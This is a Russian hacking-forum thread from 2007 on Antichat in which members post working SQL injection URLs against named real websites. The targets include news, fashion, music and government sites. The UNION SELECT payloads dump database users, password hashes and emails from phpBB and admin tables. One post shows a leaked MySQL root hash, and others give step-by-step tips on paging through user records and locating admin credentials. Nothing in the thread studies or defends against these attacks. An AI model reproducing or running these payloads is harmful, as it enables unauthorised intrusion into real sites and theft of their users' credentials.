Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
03.04.2007, 00:07
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613
Репутация:
1365
|
|
www.uralmedia.ru
Професси АНАЛЬНЫЙ хостинг =\
Код:
http://www.uralmedia.ru/news.php3?id=-80+union+select+1,concat(user,0x3a,password),3,4,5,6+from+mysql.user/*
Таже каша :
Код:
http://www.megatrac.ru/news.php3?id=-72+union+select+1,concat(user,0x3a,password),3,4,5,6+from+mysql.user/*
root:572587631e9a0a92
Последний раз редактировалось zl0ba; 03.04.2007 в 00:13..
|
|
|
03.04.2007, 00:29
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613
Репутация:
1365
|
|
www.mipki.spb.ru
межотраслевой институт подготовки кадров и информации =\
Код:
http://www.mipki.spb.ru/news.php3?id=-248+union+select+1,2,concat(database(),0x3a,user(),0x3a,version()),4,5,6/*
|
|
|
|
03.04.2007, 01:49
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753
Репутация:
552
|
|
http://www.a1tv.ru/AOpenNews.php?NewsID=-381+union+select+1,2,3,4,5,concat(user_email,char( 58),user_icq,char(58),user_password),7,8+from+phpb b_users+limit+1,1/*
http://www.xmlhack.com/author.php?id=-8+union+select+1,2,3/*
http://www.llewellyn.com/bookstore/author.php?id=-38182+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
http://poetryclub.com.ua/author.php?id=-756+union+select+1,2,3,4,5,6,7,8,9/*
http://www.brcinfo.ru/authors/author.php?id=-20+union+select+1,2,3,4,5,6,7,8,9/*
http://www.trizway.com/author.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
http://pstbi.pagez.ru/author.php?id=-5+union+select+1,2/*
http://www.runiga.com/ruso/home.php?pageid=190&id=-4834+union+select+1,2,3,concat(user_icq,char(58),u ser_password),5,6,7,8,9+from+phpbb_users+limit+3,1/*
http://thelist.ru/link.php?id=-84680+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19/*
|
|
|
|
03.04.2007, 07:21
|
|
Banned
Регистрация: 10.10.2006
Сообщений: 596
Провел на форуме:
2132613
Репутация:
1365
|
|
2Thanat0z
/me смеялся =)
http://www.biodiversityscotland.gov.uk/pageType1.php?id=-2+union+select+1,concat(database(),0x3a,user(),0x3 a,version()),3,4,5/*&type=1&navID=27
|
|
|
|
03.04.2007, 11:50
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сайт http://www.singletrackworld.com/ Одна большая скуль инъекция.
Inj:
http://www.singletrackworld.com/article.php?sid=2317'
Одна колумна, таблица users. Мускул версии 5.0.22 (Весь вывод в title)
Теперь через лимит дёргаем пассы.
http://www.singletrackworld.com/article.php?sid=-2317+union+select+concat(uname,0x3a,pass)+from+use rs+limit+*,1
add:
Звёздочку поставил, ибо на первом месте стоит походу не админ. Дальше уже перебором.=]
Последний раз редактировалось [sL1p]; 03.04.2007 в 14:59..
|
|
|
|
03.04.2007, 12:07
|
|
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266
Репутация:
366
|
|
http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select +1,2,3,4,5,6,7,concat_ws(0x3a,username,user_passwo rd,user_email)+from+phpbb_users+limit+4,1/*
лимит вывод ограничивает, а то скрипт наровит всё вывести.
http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select +1,2,3,4,5,6,7,email+from+emails+limit+1206,1/*
а тут просто мыла
жалко только до данных моделей чёт не смог добраться
http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select +1,2,3,4,5,6,7,8+from+models/*
|
|
|
|
03.04.2007, 17:10
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885
Репутация:
447
|
|
Сообщение от VampiRUS
жалко только до данных моделей чёт не смог добраться
Код:
http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select+1,2,3,4,5,6,7,8+from+mo dels/*
расшивровываем и ищем админку 
Код:
http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select+1,2,3,4,5,6,7,concat(username,char(58),password)+from+admin/*
ну на кройняк можно и на форум напасть
Код:
http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select+1,2,3,4,5,6,7,concat(username,char(58),user_password)+from+phpbb_users+limit+4,1/*
|
|
|
|
03.04.2007, 17:19
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Код:
http://www.espana.ru/rus/espanola/kp/kp.php?did=1000000+union+select+1,2,3,concat(user(),char(58),version()),5,6,7,8/*
http://www.espana.ru/rus/espanola/kp/kp.php?did=1000000+union+select+1,2,3,concat(login,char(58),password),5,6,7,8+from+user+limit+0,1/*
Код:
http://www.komus-opt.ru/news.php?id=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3/*
|
|
|
|
03.04.2007, 16:18
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589
Репутация:
337
|
|
http://baymusic.ru/category.php?rid=78 - ошибка
http://baymusic.ru/category.php?rid=78/* - закоментили фигню, ошибки нет
http://baymusic.ru/category.php?rid=78+order+by+2/* - ошибка
http://baymusic.ru/category.php?rid=78+order+by+1/* - все ок, значит 1 столбец
http://baymusic.ru/category.php?rid=78+union+select+1/* - ошибка, кол-во столбцов не совпадает
Можете объяснить что тут не так? Запрос к базе там такой стоит, или order+by в этой базе работает не так как обычно? =/
|
|
|
|
03.04.2007, 16:56
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631
Репутация:
380
|
|
Код:
http://www.sport.com.ua/vote.phtml?id=-180+union+select+concat(username,char(58),password),2+from+users/*
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид